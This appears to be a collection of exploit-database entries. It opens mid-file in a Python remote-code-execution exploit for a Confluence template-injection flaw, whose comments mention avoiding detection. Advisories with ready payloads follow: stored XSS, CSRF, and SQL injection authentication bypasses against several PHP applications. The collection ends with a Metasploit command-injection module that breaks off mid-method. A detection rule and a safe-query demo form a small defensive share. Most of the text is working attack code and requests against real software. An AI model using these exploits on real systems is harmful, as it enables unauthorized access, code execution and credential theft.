%(message)s') debug_fmt = logging.Formatter('>>> %(message)s') def format(self, record): if record.levelno == logging.INFO: return self.info_fmt.format(record) elif record.levelno == logging.ERROR: return self.error_fmt.format(record) elif record.levelno == logging.WARNING: return self.warning_fmt.format(record) elif record.levelno == logging.DEBUG: return self.debug_fmt.format(record) else: return self.default_fmt.format(record) ch.setFormatter(MyFormatter()) # adding handler logger.addHandler(ch) return logger # Properties @property def endpoint(self): if not self._target_protocol or not self._target_host or not self._target_port: exit_log(log, "failed to generate endpoint URL") return f"{self._target_protocol}://{self._target_host}:{self._target_port}" @property def remote_path(self): return self.script_arguments.path @property def attachment_dir(self): home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \ Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR return f"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}" @property def rce_command(self): return self.script_arguments.command @property def session_cookie(self): if not self.script_arguments.cookie: return None parts = self.script_arguments.cookie.split("=") return { parts[0]: parts[1] } @property def proxies(self): return { "http": self._proxy, "https": self._proxy } class Exploit: """ This class represents actual exploit towards the target Confluence server. 
""" # used for both path traversal and RCE DEFAULT_VULNERABLE_ENDPOINT = "/rest/tinymce/1/macro/preview" # used only for RCE CREATE_PERSONAL_SPACE_PATH = "/rest/create-dialog/1.0/space-blueprint/create-personal-space" PERSONAL_SPACE_KEY_PATH = "/index.action" PERSONAL_SPACE_KEY_REGEX = r"^/spaces/viewspace\.action\?key=(.*?)$" PERSONAL_SPACE_ID_PATH = "/rest/api/space" PERSONAL_SPACE_KEY_PARAMETER_NAME = "spaceKey" HOMEPAGE_REGEX = r"/rest/api/content/([0-9]+)$" ATL_TOKEN_PATH = "/pages/viewpageattachments.action" FILE_UPLOAD_PATH = "/pages/doattachfile.action" # file name has no real significance, file is identified on file system by it's ID # (change only if you want to avoid detection) DEFAULT_UPLOADED_FILE_NAME = "payload_{}.vm".format( ''.join(random.choice(string.ascii_lowercase) for i in range(5)) ) # the extension .vm is not really needed, remove it if you have problems uploading the template DEFAULT_CONFLUENCE_INSTALL_DIR = "/var/atlassian/application-data/confluence" DEFAULT_CONFLUENCE_ATTACHMENT_PATH = "/attachments/ver003" # using random name for uploaded file so it will always be first version of the file DEFAULT_FILE_VERSION = "1" def __init__(self, config): """ Runs the exploit towards target_url. 
""" self._config = config self._target_url = f"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}" if self._config.script_arguments.action == "rce": self._root_url = f"{self._config.endpoint}/" self._create_personal_space_url = f"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}" self._personal_space_key_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}" # Following data will be dynamically created while exploit is running self._space_key = None self._personal_space_id_url = None self._space_id = None self._homepage_id = None self._atl_token_url = None self._atl_token = None self._upload_url = None self._file_id = None def generate_payload_location(self): """ Generates location on file system for uploaded attachment based on Confluence Ver003 scheme. See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html """ if not self._space_id or not self._homepage_id or not self._file_id: exit_log(log, "cannot generate payload location without space, homepage and file ID") space_folder_one = str(int(self._space_id[-3:]) % 250) space_folder_two = str(int(self._space_id[-6:-3]) % 250) space_folder_three = self._space_id page_folder_one = str(int(self._homepage_id[-3:]) % 250) page_folder_two = str(int(self._homepage_id[-6:-3]) % 250) page_folder_three = self._homepage_id file_folder = self._file_id version = Exploit.DEFAULT_FILE_VERSION payload_location = f"{self._config.attachment_dir}/" \ f"{space_folder_one}/{space_folder_two}/{space_folder_three}/"\ f"{page_folder_one}/{page_folder_two}/{page_folder_three}/" \ f"{file_folder}/{version}" log.debug(f"generated payload location: {payload_location}") return payload_location def path_traversal(self, target_remote_path, decode_output=False): """ Uses vulnerability in _template parameter to achieve path traversal. 
Args: target_remote_path (string): path on local file system of the target application decode_output (bool): set to True if output of the file will be character codes separated by new lines, used with RCE """ post_data = { "contentId": str(random.randint(1, 10000)), "macro": { "body": "", "name": "widget", "params": { "_template": f"file://{target_remote_path}", "url": "https://www.youtube.com/watch?v=" + ''.join(random.choice( string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) } } } log.info("sending request towards vulnerable endpoint with payload in '_template' parameter") response = requests.post( self._target_url, headers={ "Content-Type": "application/json; charset=utf-8" }, json=post_data, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "exploit failed") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve # the requested path error_element = soup.find_all("div", "widget-error") if error_element: log.warning("failed to retrieve target path on the system") log.warning("target path does not exist or application does not have appropriate permissions to view it") return "" else: # otherwise parse out the actual response (file content or directory listing) output_element = soup.find_all("div", "wiki-content") if not output_element: exit_log(log, "application did not return appropriate HTML element") if not len(output_element) == 1: log.warning("application unexpectedly returned multiple HTML elements, using the first one") output_element = output_element[0] log.debug("extracting HTML element value and stripping the leading and trailing spaces") # output = output_element.string.strip() output = 
output_element.decode_contents().strip() if "The macro 'widget' is unknown. It may have been removed from the system." in output: exit_log(log, "widget seems to be disabled on system, target most likely is not vulnerable") if not self._config.script_arguments.silent: if decode_output: parsed_output = "" p = re.compile(r"^([0-9]+)") for line in output.split("\n"): r = p.match(line) if r: parsed_output += chr(int(r.group(1))) print(parsed_output.strip()) else: print(output) return output def find_personal_space_key(self): """ Makes request that will return personal space key in the response. """ log.debug("checking if user has personal space") response = requests.get( self._root_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, ) page_content = response.text if "Add personal space" in page_content: log.info(f"user does not have personal space, creating it now...") response = requests.post( self._create_personal_space_url, headers={ "Content-Type": "application/json" }, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, json={ "spaceUserKey": "" } ) if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to create personal space") log.debug(f"personal space created") response_data = response.json() self._space_key = response_data.get("key") else: log.info("sending request to find personal space key") response = requests.get( self._personal_space_key_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... 
if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") personal_space_link_element = soup.find("a", id="view-personal-space-link") if not personal_space_link_element or not personal_space_link_element.has_attr("href"): exit_log(log, "failed to find personal space link in the response, does the user have personal space?") path = personal_space_link_element["href"] p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) r = p.match(path) if r: self._space_key = r.group(1) else: exit_log(log, "failed to find personal space key") log.debug(f"personal space key: {self._space_key}") self._personal_space_id_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?" \ f"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}" log.debug(f"generated personal space id url: {self._personal_space_id_url}") def find_personal_space_id_and_homepage_id(self): """ Makes request that will return personal space ID and homepage ID in the response. """ if self._personal_space_id_url is None: exit_log(log, f"personal space id url is missing, did you call exploit functions in correct order?") log.info("sending request to find personal space ID and homepage") response = requests.get( self._personal_space_id_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... 
if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is JSON data = json.loads(page_content) if "results" not in data: exit_log(log, "failed to find 'result' section in json output") items = data["results"] if type(items) is not list or len(items) == 0: exit_log(log, "no results for personal space id") personal_space_data = items[0] if "id" not in personal_space_data: exit_log(log, "failed to find ID in personal space data") self._space_id = str(personal_space_data["id"]) log.debug(f"found space id: {self._space_id}") if "_expandable" not in personal_space_data: exit_log(log, "failed to find '_expandable' section in personal space data") personal_space_expandable_data = personal_space_data["_expandable"] if "homepage" not in personal_space_expandable_data: exit_log(log, "failed to find homepage in personal space expandable data") homepage_path = personal_space_expandable_data["homepage"] p = re.compile(Exploit.HOMEPAGE_REGEX) r = p.match(homepage_path) if r: self._homepage_id = r.group(1) log.debug(f"found homepage id: {self._homepage_id}") self._atl_token_url = f"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}" log.debug(f"generated atl token url: {self._atl_token_url}") self._upload_url = f"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}" log.debug(f"generated upload url: {self._upload_url}") else: exit_log(log, "failed to find homepage id, homepage path has incorrect format") def get_csrf_token(self): """ Makes request to get the current CSRF token for the session. 
""" if self._atl_token_url is None: exit_log(log, f"atl token url is missing, did you call exploit functions in correct order?") log.info("sending request to find CSRF token") response = requests.get( self._atl_token_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") atl_token_element = soup.find("input", {"name": "atl_token"}) if not atl_token_element.has_attr("value"): exit_log(log, "failed to find value for atl_token") self._atl_token = atl_token_element["value"] log.debug(f"found CSRF token: {self._atl_token}") def upload_template(self): """ Makes multipart request to upload the template file to the server. """ log.info("uploading template to server") if not self._atl_token: exit_log(log, "cannot upload a file without CSRF token") if self._upload_url is None: exit_log(log, f"upload url is missing, did you call exploit functions in correct order?") # Velocity template here executes command and then captures the output. Here the output is generated by printing # character codes one by one in each line. This can be improved for sure but did not have time to investigate # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern # webapp' was not working properly. This gets decoded on our python client later. 
template = f"""#set( $test = "test" ) #set($ex = $test.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{self._config.script_arguments.command}")) #set($exout = $ex.waitFor()) #set($out = $ex.getInputStream()) #foreach($i in [1..$out.available()]) #set($ch = $out.read()) $ch #end""" log.debug(f"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}") parts = { "atl_token": (None, self._atl_token), "file_0": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), "confirm": "Attach" } response = requests.post( self._upload_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, files=parts ) # for successful upload first a 302 response needs to happen then 200 page is returned with file ID if response.status_code == 403: exit_log(log, "got 403, probably problem with CSRF token") if not len(response.history) == 1 or not response.history[0].status_code == 302: exit_log(log, "failed to upload the payload") page_content = response.content if "Upload Failed" in str(page_content): exit_log(log, "failed to upload template") # response is HTML soup = BeautifulSoup(page_content, features="html.parser") file_link_element = soup.find("a", "filename", {"title": Exploit.DEFAULT_UPLOADED_FILE_NAME}) if not file_link_element.has_attr("data-linked-resource-id"): exit_log(log, "failed to find data-linked-resource-id attribute (file ID) for uploaded file link") self._file_id = file_link_element["data-linked-resource-id"] log.debug(f"found file ID: {self._file_id}") def exploit_path_traversal(config): """ This sends one request towards vulnerable server to either get local file content or directory listing. """ log.debug("running path traversal exploit") exploit = Exploit(config) exploit.path_traversal(config.remote_path) def exploit_rce(config): """This executes multiple steps to gain RCE. Requires a session token. Steps: 1. find personal space key for the user 2. 
find personal space ID and homepage ID for the user 3. get CSRF token (generated per session) 4. upload template file with Java code (involves two requests, first one is 302 redirection) 5. use path traversal part of exploit to load and execute local template file 6. profit """ log.debug("running RCE exploit") exploit = Exploit(config) exploit.find_personal_space_key() exploit.find_personal_space_id_and_homepage_id() exploit.get_csrf_token() exploit.upload_template() payload_location = exploit.generate_payload_location() exploit.path_traversal(payload_location, decode_output=True) if __name__ == "__main__": # parse arguments and load all configuration items script_arguments = parse_arguments() log = Configuration.get_logger(script_arguments.verbosity) configuration = Configuration(script_arguments) # printing banner if not configuration.script_arguments.skip_banner: print_banner() if script_arguments.quiet: log.disabled = True log.debug("finished parsing CLI arguments") log.debug("configuration was loaded successfully") log.debug("starting exploit") # disabling warning about trusting self sign certificate from python requests urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # run appropriate function depending on mode configuration.script_arguments.func(configuration) log.debug("done!")
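Both modes of the script above send the same tell-tale request: a JSON POST to the macro preview endpoint whose widget macro carries a `_template` parameter, something a legitimate editor preview never sets. The following detection rule is an added example, not part of the exploit or of Confluence; the log records it scans are constructed, and `attacker.invalid` is a placeholder host.

```python
import json
from urllib.parse import urlsplit

# Endpoint used by the exploit above; the "_template" key inside the widget
# macro's params is the signal, regardless of which scheme it points at.
PREVIEW_PATH = "/rest/tinymce/1/macro/preview"
TEMPLATE_PARAM = "_template"
LOCAL_SCHEMES = {"file"}
REMOTE_SCHEMES = {"http", "https", "ftp"}


def inspect_request(method, path, body):
    """Return a finding dict for one request, or None when nothing looks wrong."""
    if method.upper() != "POST" or not path.endswith(PREVIEW_PATH):
        return None
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return None  # not a JSON macro preview; outside the scope of this rule
    if not isinstance(data, dict):
        return None
    macro = data.get("macro")
    params = macro.get("params") if isinstance(macro, dict) else None
    if not isinstance(params, dict) or TEMPLATE_PARAM not in params:
        return None
    template = str(params[TEMPLATE_PARAM])
    scheme = urlsplit(template).scheme.lower()
    if scheme in LOCAL_SCHEMES:
        kind = "local-template-load"    # file:// read, or a locally staged template (rce mode)
    elif scheme in REMOTE_SCHEMES:
        kind = "remote-template-load"   # the originally published form of CVE-2019-3396
    else:
        kind = "unexpected-template-param"
    return {
        "kind": kind,
        "macro": macro.get("name"),
        "template": template,
        "content_id": data.get("contentId"),
    }


def scan_log(records):
    """Run the rule over (method, path, body) records; findings come back in log order."""
    findings = []
    for rec in records:
        finding = inspect_request(rec["method"], rec["path"], rec["body"])
        if finding:
            findings.append(finding)
    return findings


# Constructed sample records (not real traffic).
SAMPLE_RECORDS = [
    # benign preview: widget macro with only its "url" parameter
    {"method": "POST", "path": "/confluence/rest/tinymce/1/macro/preview",
     "body": json.dumps({"contentId": "1234", "macro": {"name": "widget", "body": "",
                         "params": {"url": "https://www.youtube.com/watch?v=abc"}}})},
    # file:// template, as sent by the fs and rce modes of the script above
    {"method": "POST", "path": "/confluence/rest/tinymce/1/macro/preview",
     "body": json.dumps({"contentId": "4242", "macro": {"name": "widget", "body": "",
                         "params": {"_template": "file:///etc/passwd",
                                    "url": "https://www.youtube.com/watch?v=xyz"}}})},
    # remote template: the originally published variant of the vulnerability
    {"method": "POST", "path": "/confluence/rest/tinymce/1/macro/preview",
     "body": json.dumps({"contentId": "77", "macro": {"name": "widget", "body": "",
                         "params": {"_template": "https://attacker.invalid/evil.vm",
                                    "url": "https://www.youtube.com/watch?v=xyz"}}})},
    # _template with no scheme at all: still not something a preview should carry
    {"method": "POST", "path": "/confluence/rest/tinymce/1/macro/preview",
     "body": json.dumps({"contentId": "78", "macro": {"name": "widget",
                         "params": {"_template": "templates/other.vm"}}})},
    # unrelated endpoint and a non-JSON body: both ignored by the rule
    {"method": "GET", "path": "/confluence/index.action", "body": ""},
    {"method": "POST", "path": "/confluence/rest/tinymce/1/macro/preview", "body": "<not json>"},
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_RECORDS):
        print(f"{f['kind']:28} contentId={f['content_id']} template={f['template']}")
```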
-
MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting
# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
# Date: 1/21/2021
# Author: 0xB9
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
# Version: 1.0
# Tested on: Windows 10

1. Description:
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles and a CSRF that allows the user's timeline banner/image to be changed.

2. Proof of Concept:

~ XSS via Thread/Post ~
- Make a new thread or reply to an existing thread
- Input a payload in either the thread title or the main post itself
<script>alert('XSS')</script>
The payload will execute when visiting your profile.

~ XSS via Location/Bio ~
- Go to User CP -> Edit Profile
- Input a payload in the Location/Bio
<script>alert('XSS')</script>
The payload will execute when visiting your profile.

~ CSRF ~
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
    <input type="text" name="coverpic" placeholder="Add Image URL" required="">
    <input type="hidden" name="do_coverpic" value="change">
    <input type="submit" value="Change">
</form>
-
Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Date: 2021-01-23
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
# CVE: CVE-2021-3298

==> Tutorial <==
1- Log in to your account.
2- Go to the profile edit page and write your XSS/HTML payload into the "Address" section.
- You will see the executed HTML payload there. (HTML Injection)
- You will see the executed XSS payload in the profile edit section. (XSS)

==> Executed Payloads <==
XSS Payload ==> " onfocus="alert(1)" autofocus="
HTML Payload ==> <h1>DehaBerkinBir</h1>

==> HTTP Request <==
POST /manageuser.php?action=edit HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/manageuser.php?action=editform&id=1
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
Content-Length: 2327
Connection: close
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
Upgrade-Insecure-Requests: 1

-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="name"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="file-avatar"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="company"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="web"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel1"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address1"

" onfocus="alert(1)" autofocus="
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="zip"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="country"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="state"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="gender"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="locale"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="admin"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="oldpass"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="newpass"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="repeatpass"


-----------------------------12097618915709137911841560297--
-
Library System 1.0 - 'category' SQL Injection
# Exploit Title: Library System 1.0 - 'category' SQL Injection
# Exploit Author: Aitor Herrero
# Date: 2021-01-22
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0

# STEP 1: Go to the main page
# STEP 2: Choose a category, for example: http://localhost:8080/libsystem/libsystem/index.php?category=3
# STEP 3: Run sqlmap against it, for example: sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs
-
CASAP Automated Enrollment System 1.0 - 'route' Stored XSS
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'route' Stored XSS
# Exploit Author: Richard Jones
# Date: 2021-01-23
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Steps to reproduce
# 1. Login bypass: username: admin, password: `' or 1=1#
# 2. Students > Edit > in the "ROUTE" field enter: <script>alert(document.cookie)</script>
#    Save, reload the page, and the stored XSS fires

POST /Final/update_student.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 297
Origin: http://TARGET
Connection: close
Referer: http://TARGET/Final/edit_stud.php?id=6
Cookie: PHPSESSID=97qoeda9h6djjis5gbr00p7ndc

student_id=6&status=half&fname=Ronel&mname=G.&lname=Ortega&gender=Male&dob=1999-06-16&address=Prk.1+brgy.banago+bacolod+city&student_class=ICT+-+Computer+Programming&transport=yes&route=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&gfname=Juanita&gmname=S.&glname=a&rship=Mother&tel=0912312445
-
CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
# Exploit Author: Anita Gaud
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1
# Tested on: Windows
# CVE: CVE-2021-3294

*XSS IMPACT:*
1: Steal the cookie
2: Redirect the user to a malicious website

Vulnerable Parameters: First Name

*Steps to reproduce:*
1: Log in with a valid username and password. Navigate to the Users tab (http://localhost/Final/Final/users.php) on the left-hand side.
2: Add a new user, put the payload <script>alert(document.cookie)</script> in the First Name parameter and click the save button. The record is saved successfully.
3: The XSS is now stored and triggers every time the page is viewed, so an attacker can steal authenticated users' cookies.
-
Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
# Exploit Author: Marco Catalano (@stunn4)
# Date: 2021-01-25
# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "name" (POST method)
# Tested on: Linux, PHP/7.4.11

Explanation:
The source of the "/admin_pages/login.php" file defines the following lines of code:

$name=$_POST['name'];
$password=$_POST['password'];
$result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'");

which are executed when trying to log into the administrative panel at "/admin_pages/login.php" itself.

Proof Of Concept:
The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -", where <username> has to be a valid username. For example, the default username is "florian".

POST /admin_pages/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin_pages/login.php
Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
Upgrade-Insecure-Requests: 1

name=florian%27+or+%271%27+%3D+%271+--+-&password=test&login=Login
-
Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)
# Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)
# Exploit Author: Marco Catalano
# Date: 2021-01-25
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "user_email" (POST method)
# Tested on: Linux, PHP/7.4.11

Explanation:
The userAuthentication function defined in "/include/accounts.php" implements the following code:

$mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'");

which is called when trying to log into the administrative panel at "/admin/login.php".

Proof Of Concept:
The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -", where <username> has to be a valid username. For example, the default username is "janobe".

POST /admin/login.php?logout=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin/login.php?logout=1
Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
Upgrade-Insecure-Requests: 1

user_email=janobe%27+or+%271%27+%3D+%271--+-&user_pass=test&btnLogin=
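The Simple College Website and Cemetery Mapping advisories above quote the same defect: request values concatenated into the SQL text, so a valid username followed by a tautology satisfies the WHERE clause whatever password is sent. The following is an added example, not code from either product, that places that concatenated query beside a parameterized one over a constructed SQLite table; the SHA-256 helper is an assumption standing in for the Cemetery advisory's $h_pass.

```python
import hashlib
import sqlite3

# Payload quoted in both advisories: a valid username plus the classic tautology.
# Spliced into the concatenated query it yields
#   WHERE name='florian' or '1' = '1 -- -' AND Password='<hash>'
# and since AND binds tighter than OR, the row for "florian" matches regardless
# of the password (the "--" sits inside a string literal, so it is not a comment).
BYPASS_PAYLOAD = "florian' or '1' = '1 -- -"


def hash_password(password):
    # Assumed stand-in for the $h_pass hashing in the Cemetery advisory; a real
    # application should use a slow, salted password hash rather than plain SHA-256.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db():
    """Constructed in-memory users table with one account (not taken from either product)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, Password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("florian", hash_password("correct-horse")))
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """Mirrors the advisories' pattern: request values spliced straight into the SQL text."""
    query = (
        "SELECT * FROM users WHERE name='" + name
        + "' AND Password='" + hash_password(password) + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_fixed(conn, name, password):
    """Same check with bound parameters: the input can never change the query structure."""
    row = conn.execute(
        "SELECT * FROM users WHERE name=? AND Password=?",
        (name, hash_password(password)),
    ).fetchone()
    return row is not None


def compare(conn):
    """Return what each implementation decides for normal and injected login attempts."""
    cases = {
        "valid": ("florian", "correct-horse"),
        "wrong_password": ("florian", "wrong"),
        "bypass": (BYPASS_PAYLOAD, "wrong"),
    }
    return {
        label: {"vulnerable": login_vulnerable(conn, *creds), "fixed": login_fixed(conn, *creds)}
        for label, creds in cases.items()
    }


if __name__ == "__main__":
    for label, result in compare(make_db()).items():
        print(f"{label:15} vulnerable={result['vulnerable']} fixed={result['fixed']}")
```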
-
Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Klog Server Unauthenticated Command Injection Vulnerability',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
        "user" parameter is executed via shell_exec() function without input validation.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'B3KC4T',               # Vulnerability discovery
          'Metin Yunus Kandemir', # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2020-35729'],
          ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
        ],
      'DefaultOptions' =>
        {
          'HttpClientTimeout' => 2,
        },
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => [ ARCH_X64 ],
      'Targets'        =>
        [
          ['Klog Server 2.4.1 (x64)',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_X64,
            }],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "2021-01-05",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
      ]
    )
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
  end

  def execute_command(cmd, opts = {})
    command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
    print_status("Sending stager payload...")
    uri = target_uri.path
    res = send_request_cgi({
      'method'        => 'POST',
      'uri'           => normalize_uri(uri, 'actions', 'authenticate.php'),
      'encode_params' => false,
      'vars_post'     => {
        'user' => command_payload,
        'pswd' => "inline"
      }
    })
    if res && res.code == 302
      print_error("The target is not vulnerable!")
    else
      print_good("The target is vulnerable!")
    end
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method'        => 'POST',
